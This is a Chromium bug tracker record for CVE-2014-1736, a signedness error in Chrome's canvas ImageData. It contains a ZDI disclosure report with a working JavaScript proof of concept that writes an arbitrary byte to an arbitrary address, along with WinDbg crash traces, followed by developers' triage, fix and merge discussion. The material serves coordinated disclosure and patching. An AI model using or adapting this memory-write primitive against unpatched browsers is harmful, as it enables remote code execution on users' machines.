New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 0 users

Issue metadata

Status: Fixed
Owner:
Email to this user bounced
Closed: Apr 2014
Cc:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 359802: ZDI-CAN-2245: Google Chrome ImageData Signedness Error Remote Code Execution VulnerabilityImageData Signedness Error Remote Code Execution Vulnerability

Reported by timwillis@google.com, Apr 3 2014 Project Member

Issue description

UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36

Steps to reproduce the problem:
Copy-paste of report to security@google.com from zdi-disclosures@tippingpoint.com (ref 2-6504000003209)

================

ZDI-CAN-2245: Google Chrome ImageData Signedness Error Remote Code Execution Vulnerability

-- CVSS -----------------------------------------

6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P

-- ABSTRACT -------------------------------------

HP's Zero Day Initiative has identified a vulnerability affecting the following products:

  Google Chrome

-- VULNEREmail Subject: ZDI-CAN-2245: New Vulnerability Report

Email Recipient: security@google.com

ABILITY DETAILS ------------------------

This has to be tested on a 64 bit system. 
Tested on win8.1/64 with Chrome Canary.

The allocation in 64 bit OS in this case happens at 0x7FFF0000:

The following is legit, even if chrome.exe is 32 bit:

There's an signedness error in the handling the pixel data:

First create a huge pixel image data:

oImageData = oContext2d.createImageData(0x10FFFFFF,1);

function addressToIndex(iAddress) {
return iAddress + (iAddress < 0x7fff0000 ? +0x80010000 : -0x7fff0000);
}

oImageData.data[addressToIndex(0x41414141)] = 0x41; //inject byte anywhere

in our case it's going to endup: 0x41414141 + 0x80010000

```
4:061> dd 0x7fff0000
7fff0000  00000000 00000000 00000000 00000000
7fff0010  00000000 00000000 00000000 00000000
7fff0020  00000000 00000000 00000000 00000000
7fff0030  00000000 00000000 00000000 00000000
7fff0040  00000000 00000000 00000000 00000000
7fff0050  00000000 00000000 00000000 00000000
7fff0060  00000000 00000000 00000000 00000000
7fff0070  00000000 00000000 00000000 00000000
4:061> dd 0x80000000
80000000  00000000 00000000 00000000 00000000
80000010  00000000 00000000 00000000 00000000
80000020  00000000 00000000 00000000 00000000
80000030  00000000 00000000 00000000 00000000
80000040  00000000 00000000 00000000 00000000
80000050  00000000 00000000 00000000 00000000
80000060  00000000 00000000 00000000 00000000
80000070  00000000 00000000 00000000 00000000
```

```
(eb4.9dc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000041 ebx=00a2ec5c ecx=7fff0000 edx=c400007d esi=c1424141 edi=268080c5
eip=6da23c30 esp=00a2ebd8 ebp=00a2ebe8 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010297
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_child.dll - 
chrome_child!ovly_debug_event+0x510e9c:
6da23c30 88040e          mov     byte ptr [esi+ecx],al      ds:002b:41414141=??
4:061> .sympath SRV*z:\symbolscache*http://msdl.microsoft.com/download/symbols;SRV*z:\symbolscache*http://chromium-browser-symsrv.commondatastorage.googleapis.com
Symbol search path is: SRV*z:\symbolscache*http://msdl.microsoft.com/download/symbols;SRV*z:\symbolscache*http://chromium-browser-symsrv.commondatastorage.googleapis.com
Expanded Symbol search path is: srv*z:\symbolscache*http://msdl.microsoft.com/download/symbols;srv*z:\symbolscache*http://chromium-browser-symsrv.commondatastorage.googleapis.com
4:061> .reload
Reloading current modules
..........................................................
4:061> r
eax=00000041 ebx=00a2ec5c ecx=7fff0000 edx=c400007d esi=c1424141 edi=268080c5
eip=6da23c30 esp=00a2ebd8 ebp=00a2ebe8 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010297
chrome_child!v8::internal::ExternalPixelArray::SetValue+0x88:
6da23c30 88040e          mov     byte ptr [esi+ecx],al      ds:002b:41414141=??
4:061> kvb
ChildEBP RetAddr  Args to Child              
00a2ebe8 6d678245 27108879 01c0c000 c1424141 chrome_child!v8::internal::ExternalPixelArray::SetValue+0x88 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 14771]
00a2ec08 6d678128 00a2ec5c 00a2ed88 c1424141 chrome_child!v8::internal::JSObject::SetElementWithoutInterceptor+0x109 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 12712]
00a2ec68 6d677934 00a2eca8 00a2ed88 c1424141 chrome_child!v8::internal::JSObject::SetElement+0x59e (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 12609]
00a2ecb8 6d66c426 01c0c000 00a2ed88 00a2ed84 chrome_child!v8::internal::Runtime::SetObjectProperty+0x1b2 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\runtime.cc @ 5244]
00a2ecf0 6d66c0da 01c0e63c 00a2ed88 00a2ed84 chrome_child!v8::internal::KeyedStoreIC::Store+0x241 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2024]
00a2ed48 6d66bfc7 00000003 00a2ed88 00a2ed78 chrome_child!v8::internal::__RT_impl_KeyedStoreIC_Miss+0xdb (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2244]
00a2ee14 6d642b9c 1fe2a5c0 1ed30519 34a4789d chrome_child!v8::internal::KeyedStoreIC_Miss+0x16 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2237]
00a2ee5c 6d642a60 00a2eed0 01c0c1a4 01c4f058 chrome_child!v8::internal::Invoke+0x130 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\execution.cc @ 119]
00a2ee98 6d6e1532 00a2eed0 01c0c000 01c4f058 chrome_child!v8::internal::Execution::Call+0x16d (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\v8\src\execution.cc @ 183]
00a2eef0 6d72536f 00a2ef18 01c4f074 00000001 chrome_child!v8::Function::Call+0x102 (FPO: [Non-Fpo]) (CONV: thiscall) [c:\b\build\slave\win\build\src\v8\src\api.cc @ 4191]
00a2ef38 6d724eeb 00a2ef68 01c4f058 01c4f074 chrome_child!WebCore::V8ScriptRunner::callFunction+0x143 (FPO: [Non-Fpo]) (CONV: cdecl) [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8scriptrunner.cpp @ 136]
4:061> kPn
 # ChildEBP RetAddr  
00 00a2ebe8 6d678245 chrome_child!v8::internal::ExternalPixelArray::SetValue(
			unsigned int index = 0xc1424141, 
			class v8::internal::Object * value = 0x7fff0000)+0x88 [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 14771]
01 00a2ec08 6d678128 chrome_child!v8::internal::JSObject::SetElementWithoutInterceptor(
			class v8::internal::Handle<v8::internal::JSObject> object = class v8::internal::Handle<v8::internal::JSObject>, 
			unsigned int index = 0xc1424141, 
			class v8::internal::Handle<v8::internal::Object> value = class v8::internal::Handle<v8::internal::Object>, 
			PropertyAttributes attributes = NONE (0), 
			v8::internal::StrictModeFlag strict_mode = kNonStrictMode (0), 
			bool check_prototype = true, 
			v8::internal::SetPropertyMode set_mode = SET_PROPERTY (0))+0x109 [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 12712]
02 00a2ec68 6d677934 chrome_child!v8::internal::JSObject::SetElement(
			class v8::internal::Handle<v8::internal::JSObject> object = class v8::internal::Handle<v8::internal::JSObject>, 
			unsigned int index = 0xc1424141, 
			class v8::internal::Handle<v8::internal::Object> value = class v8::internal::Handle<v8::internal::Object>, 
			PropertyAttributes attributes = NONE (0), 
			v8::internal::StrictModeFlag strict_mode = kNonStrictMode (0), 
			bool check_prototype = true, 
			v8::internal::SetPropertyMode set_mode = SET_PROPERTY (0))+0x59e [c:\b\build\slave\win\build\src\v8\src\objects.cc @ 12609]
03 00a2ecb8 6d66c426 chrome_child!v8::internal::Runtime::SetObjectProperty(
			class v8::internal::Isolate * isolate = 0x01c0c000, 
			class v8::internal::Handle<v8::internal::Object> object = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> key = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> value = class v8::internal::Handle<v8::internal::Object>, 
			PropertyAttributes attr = NONE (0), 
			v8::internal::StrictModeFlag strict_mode = kNonStrictMode (0))+0x1b2 [c:\b\build\slave\win\build\src\v8\src\runtime.cc @ 5244]
04 00a2ecf0 6d66c0da chrome_child!v8::internal::KeyedStoreIC::Store(
			class v8::internal::Handle<v8::internal::Object> object = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> key = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> value = class v8::internal::Handle<v8::internal::Object>)+0x241 [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2024]
05 00a2ed48 6d66bfc7 chrome_child!v8::internal::__RT_impl_KeyedStoreIC_Miss(
			class v8::internal::Arguments args = class v8::internal::Arguments, 
			class v8::internal::Isolate * isolate = 0x00000041)+0xdb [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2244]
06 00a2ee14 6d642b9c chrome_child!v8::internal::KeyedStoreIC_Miss(
			int args_length = 3, 
			class v8::internal::Object ** args_object = 0x00a2ed88, 
			class v8::internal::Isolate * isolate = 0x01c0c000)+0x16 [c:\b\build\slave\win\build\src\v8\src\ic.cc @ 2237]
07 00a2ee5c 6d642a60 chrome_child!v8::internal::Invoke(
			bool is_construct = true, 
			class v8::internal::Handle<v8::internal::JSFunction> function = class v8::internal::Handle<v8::internal::JSFunction>, 
			class v8::internal::Handle<v8::internal::Object> receiver = class v8::internal::Handle<v8::internal::Object>, 
			int argc = 1, 
			class v8::internal::Handle<v8::internal::Object> * args = 0x00a2efcc, 
			bool * has_pending_exception = 0x00a2eecf)+0x130 [c:\b\build\slave\win\build\src\v8\src\execution.cc @ 119]
08 00a2ee98 6d6e1532 chrome_child!v8::internal::Execution::Call(
			class v8::internal::Isolate * isolate = 0x01c0c000, 
			class v8::internal::Handle<v8::internal::Object> callable = class v8::internal::Handle<v8::internal::Object>, 
			class v8::internal::Handle<v8::internal::Object> receiver = class v8::internal::Handle<v8::internal::Object>, 
			int argc = 1, 
			class v8::internal::Handle<v8::internal::Object> * argv = 0x00a2efcc, 
			bool * pending_exception = 0x00a2eecf, 
			bool convert_receiver = true)+0x16d [c:\b\build\slave\win\build\src\v8\src\execution.cc @ 183]
09 00a2eef0 6d72536f chrome_child!v8::Function::Call(
			class v8::Handle<v8::Value> recv = class v8::Handle<v8::Value>, 
			int argc = 1, 
			class v8::Handle<v8::Value> * argv = 0x00a2efcc)+0x102 [c:\b\build\slave\win\build\src\v8\src\api.cc @ 4191]
0a 00a2ef38 6d724eeb chrome_child!WebCore::V8ScriptRunner::callFunction(
			class v8::Handle<v8::Function> function = class v8::Handle<v8::Function>, 
			class WebCore::ExecutionContext * context = 0x00000041, 
			class v8::Handle<v8::Value> receiver = class v8::Handle<v8::Value>, 
			int argc = 1, 
			class v8::Handle<v8::Value> * info = 0x00a2efcc, 
			class v8::Isolate * isolate = 0x01c0c000)+0x143 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8scriptrunner.cpp @ 136]
0b 00a2ef78 6d724957 chrome_child!WebCore::ScriptController::callFunction(
			class WebCore::ExecutionContext * context = 0x2d404064, 
			class v8::Handle<v8::Function> function = class v8::Handle<v8::Function>, 
			class v8::Handle<v8::Object> receiver = class v8::Handle<v8::Object>, 
			int argc = 1, 
			class v8::Handle<v8::Value> * info = 0x00a2efcc, 
			class v8::Isolate * isolate = 0x01c0c000)+0x110 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\scriptcontroller.cpp @ 180]
0c 00a2efa4 6d72cbd6 chrome_child!WebCore::ScriptController::callFunction(
			class v8::Handle<v8::Function> function = class v8::Handle<v8::Function>, 
			class v8::Handle<v8::Object> receiver = class v8::Handle<v8::Object>, 
			int argc = 1, 
			class v8::Handle<v8::Value> * info = 0x00a2efcc)+0x45 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\scriptcontroller.cpp @ 152]
0d 00a2efd0 6d72c618 chrome_child!WebCore::V8EventListener::callListenerFunction(
			class WebCore::ExecutionContext * context = 0x01c4f058, 
			class v8::Handle<v8::Value> jsEvent = class v8::Handle<v8::Value>, 
			class WebCore::Event * event = 0x01c4f074)+0x82 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8eventlistener.cpp @ 93]
0e 00a2f028 6d72a6b7 chrome_child!WebCore::V8AbstractEventListener::invokeEventHandler(
			class WebCore::ExecutionContext * context = 0x2d404064, 
			class WebCore::Event * event = 0x01bf6100, 
			class v8::Local<v8::Value> jsEvent = class v8::Local<v8::Value>)+0xd7 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8abstracteventlistener.cpp @ 129]
0f 00a2f068 6d72a401 chrome_child!WebCore::V8AbstractEventListener::handleEvent(
			class WebCore::ExecutionContext * context = 0x2d404064, 
			class WebCore::Event * event = 0x01bf6100)+0x139 [c:\b\build\slave\win\build\src\third_party\webkit\source\bindings\v8\v8abstracteventlistener.cpp @ 94]
10 00a2f0a0 6d5d0b11 chrome_child!WebCore::EventTarget::fireEventListeners(
			class WebCore::Event * event = 0x01bf6100, 
			struct WebCore::EventTargetData * d = 0x01bfe0c4, 
			class WTF::Vector<WebCore::RegisteredEventListener,1> * entry = 0x033885a0)+0x27c [c:\b\build\slave\win\build\src\third_party\webkit\source\core\events\eventtarget.cpp @ 334]
11 00a2f0dc 6d62b3f9 chrome_child!WebCore::EventTarget::fireEventListeners(
			class WebCore::Event * event = 0x01bf6100)+0xdb [c:\b\build\slave\win\build\src\third_party\webkit\source\core\events\eventtarget.cpp @ 275]
12 00a2f100 6d7568ef chrome_child!WebCore::DOMWindow::dispatchEvent(
			class WTF::PassRefPtr<WebCore::Event> prpEvent = class WTF::PassRefPtr<WebCore::Event>, 
			class WTF::PassRefPtr<WebCore::EventTarget> prpTarget = class WTF::PassRefPtr<WebCore::EventTarget>)+0xbf [c:\b\build\slave\win\build\src\third_party\webkit\source\core\frame\domwindow.cpp @ 1627]
13 00a2f124 6d7567b9 chrome_child!WebCore::DOMWindow::dispatchLoadEvent(void)+0x89 [c:\b\build\slave\win\build\src\third_party\webkit\source\core\frame\domwindow.cpp @ 1598]
4:061> !lmi chrome
Loaded Module Info: [chrome] 
         Module: chrome
   Base Address: 01330000
     Image Name: chrome.exe
   Machine Type: 332 (I386)
     Time Stamp: 5323921f Fri Mar 14 16:34:55 2014
           Size: d7000
       CheckSum: d8fe4
Characteristics: 122  
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    54, 8d328,   8c728 RSDS - GUID: {DD26A8BC-8557-47F4-9324-A2F94A5753A3}
               Age: 1, Pdb: C:\b\build\slave\win\build\src\build\Release\chrome.exe.pdb
    Symbol Type: DEFERRED - No error - symbol load deferred
    Load Report: no symbols loaded
4:061> !lmi chrome_child
Loaded Module Info: [chrome_child] 
         Module: chrome_child
   Base Address: 6d4f0000
     Image Name: C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_child.dll
   Machine Type: 332 (I386)
     Time Stamp: 532391cb Fri Mar 14 16:33:31 2014
           Size: 1fba000
       CheckSum: 1f84c4f
Characteristics: 2122  perf
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    64, 1d9bcd0, 1d9b0d0 RSDS - GUID: {5F3ACFCB-03EE-43F8-83A5-57EC41874701}
               Age: 1, Pdb: C:\b\build\slave\win\build\src\build\Release\syzygy\chrome_child.dll.pdb
     Image Type: FILE     - Image read successfully from debugger.
                 C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\chrome_child.dll
    Symbol Type: PDB      - Symbols loaded successfully from symbol server.
                 C:\debuggers\sym\chrome_child.dll.pdb\5F3ACFCB03EE43F883A557EC418747011\chrome_child.dll.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [10.0 bld 40219]
    Load Report: private symbols & lines, source indexed 
                 C:\debuggers\sym\chrome_child.dll.pdb\5F3ACFCB03EE43F883A557EC418747011\chrome_child.dll.pdb
4:061> vertarget
Windows 7 Version 9200 UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.3.9600.16384 (winblue_rtm.130821-1623)
Machine Name:
Debug session time: Thu Mar 27 06:00:53.077 2014 (GMT-7)
System Uptime: 6 days 23:03:24.556
Process Uptime: 0 days 0:01:20.138
  Kernel time: 0 days 0:00:01.562
  User time: 0 days 0:00:01.437
```

-- CREDIT ---------------------------------------

This vulnerability was discovered by:

   SkyLined working with HP's Zero Day Initiative

-- FURTHER DETAILS ------------------------------

If supporting files were contained with this report they are provided within a password protected ZIP file. The password is the ZDI candidate number in the form: ZDI-CAN-XXXX where XXXX is the ID number.

Please confirm receipt of this report. We expect all vendors to remediate ZDI vulnerabilities within 120 days of the reported date. If you are ready to release a patch at any point leading up the the deadline please coordinate with us so that we may release our advisory detailing the issue. If the 120 day deadline is reached and no patch has been made available we will release a limited public advisory with our own mitigations so that the public can protect themselves in the absence of a patch. Please keep us updated regarding the status of this issue and feel free to contact us at any time:

Zero Day Initiative
zdi-disclosures@tippingpoint.com

The PGP key used for all ZDI vendor communications is available from:

     http://www.zerodayinitiative.com/documents/zdi-pgp-key.asc

-- INFORMATION ABOUT THE ZDI ---------------------

Established by TippingPoint and acquired by Hewlett-Packard, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

The ZDI is unique in how the acquired vulnerability information is used. The ZDI does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, the ZDI provides its HP TippingPoint customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available.

    http://www.zerodayinitiative.com

-- DISCLOSURE POLICY ----------------------------

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

What is the expected behavior?

What went wrong?
See above

Did this work before? N/A 

Chrome version: 33.0.1750.154  Channel: stable
OS Version: 8.1
Flash Version:
 

Comment 1 by infe...@chromium.org, Apr 3 2014

Cc: a deleted user
Owner: danno@chromium.org

Comment 2 by infe...@chromium.org, Apr 3 2014

Cc: -a deleted user mstarzinger@chromium.org

Comment 3 by infe...@chromium.org, Apr 3 2014

Status: Assigned

Comment 4 by tav...@gmail.com, Apr 3 2014

Missing preamble: oContext2d = document.createElement("canvas").getContext("2d");

Comment 5 by danno@chromium.org, Apr 4 2014

Cc: danno@chromium.org dslomov@chromium.org
Labels: -Pri-2 Pri-1
Owner: jkummerow@chromium.org

Comment 6 by jkummerow@chromium.org, Apr 4 2014

Status: Started
The issue is that v8::Object::SetIndexedPropertiesToPixelData(uint8_t* data, int length) doesn't check whether "length" fits into a Smi, so when we store it as the length property of an external array and read it back out, we get an accidental sign extension, which in turn is interpreted as a very big value by our unsigned bounds check comparisons.
This requires a 32-bit browser on a 64-bit OS to trigger; further it requires a typed array that's fed into V8 via an API call (whereas doing "new Uint8ClampedArray(0x40000000)" in JavaScript is caught by appropriate checks).
I'm working on a fix.

Comment 7 by jkummerow@chromium.org, Apr 4 2014

Status: Fixed
Fixed in https://code.google.com/p/v8/source/detail?r=20519, will likely roll into Chromium on Monday.

Comment 8 by ClusterFuzz, Apr 4 2014

Project Member
Labels: -Restrict-View-SecurityTeam Merge-Triage Restrict-View-SecurityNotify
Adding Merge-Triage label for tracking purposes.

Once your fix had sufficient bake time (on canary, dev as appropriate), please nominate your fix for merge by adding the Merge-Requested label.

When your merge is approved by the release manager, please start merging with higher milestone label first. Make sure to re-request merge for every milestone in the label list. You can get branch information on omahaproxy.appspot.com.

- Your friendly ClusterFuzz

Comment 9 by jkummerow@chromium.org, Apr 4 2014

Status: Started
Actually, it's not quite fixed yet. It seems I was confused. We need to check in v8::Uint8ClampedArray::New and friends.

Comment 10 by infe...@chromium.org, Apr 4 2014

Labels: -OS-Windows -Merge-Triage -Restrict-View-SecurityNotify OS-All Security_Impact-Beta Restrict-View-SecurityTeam Security_Impact-Stable Security_Severity-High

Comment 11 by ClusterFuzz, Apr 4 2014

Project Member
Labels: M-34

Comment 12 by dslomov@chromium.org, Apr 5 2014

Proposed fix https://codereview.chromium.org/225983005 grades vulnerability for crash. This is a simple and easily back-mergeable fix.
The proper fix should throw from v8::XXXArray::New functions, returning empty handles.
However this needs also modifications in Blink:
1. In bindings to handle these functions throwing
2. In implementation of createImageData, throwing at creation time when the backing store for image data is too big.

Comment 13 by dslomov@chromium.org, Apr 7 2014

Cc: -dslomov@chromium.org jkummerow@chromium.org
Owner: dslomov@chromium.org
Fix landed in https://code.google.com/p/v8/source/detail?r=20525

Comment 14 by infe...@chromium.org, Apr 7 2014

Status: Fixed

Comment 15 by dslomov@chromium.org, Apr 8 2014

Labels: Merge-Requested

Comment 16 by dxie@chromium.org, Apr 9 2014

Labels: -Merge-Requested Merge-Approved

Comment 17 by scarybea...@gmail.com, Apr 10 2014

Cc: berendja...@gmail.com

Comment 18 by scarybea...@gmail.com, Apr 13 2014

Labels: ZDI-CAN-2245
Attaching couple of files from an encrypted ZIP that came along with the original report.
ZDI-CAN-2245.pcap
1.5 KB Download
repro (1).html
510 bytes View Download

Comment 19 by dslomov@chromium.org, Apr 17 2014

Labels: -Merge-Approved Merge-Merged
version: 3.24.35.33
branch: branches/3.24
svn revision: 20860
patches: r20525

Comment 20 by timwillis@chromium.org, Apr 21 2014

Cc: zdi.disc...@gmail.com
+cc original reporter.

Comment 21 by scarybea...@gmail.com, Apr 25 2014

Labels: Release-1-M34
The version of v8 mentioned in #c19 shipped with M34 patch 1: http://googlechromereleases.blogspot.com/2014/04/stable-channel-update_24.html

Tagging.

Comment 22 by timwillis@chromium.org, Apr 26 2014

Labels: CVE-2014-1736

Comment 23 by timwillis@chromium.org, Apr 26 2014

Credit for this report will be added to the release notes at  http://googlechromereleases.blogspot.com/2014/04/stable-channel-update_24.html on Monday April 28.

Comment 24 by timwillis@chromium.org, Apr 28 2014

Release notes updated adding in this bug. Note that this bug is still marked as "Restrict-View-SecurityTeam". Once the update reaches all our users, this permission will be removed and the bug details will become public.

Comment 25 by berendja...@gmail.com, Jul 9 2014

Release blog says this was supposed to be fixed in 34.0.1847.131, yet it still affects my version 35.0.1916.153 m, am I missing something?

Comment 26 by jkummerow@chromium.org, Jul 9 2014

Looks like this has been fixed at the beginning of the M36 development cycle, and never been merged back to M35 (but was merged to M34). Oops.

It's probably too late to do anything now, as M36 should hit the stable channel soon, and I don't think there'll be another M35 refresh before then.

Comment 27 Deleted

Comment 28 by berendja...@gmail.com, Jul 9 2014

I'll delay publishing details some more then :)

Comment 29 by ClusterFuzz, Jul 14 2014

Project Member
Labels: -Restrict-View-SecurityTeam
Bulk update: removing view restriction from closed bugs.

Comment 30 by ClusterFuzz, Feb 2 2016

Project Member
Labels: -Security_Impact-Beta

Comment 31 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 32 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 33 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Comment 34 by awhalley@chromium.org, Apr 25 2018

Labels: CVE_description-submitted

Sign in to add a comment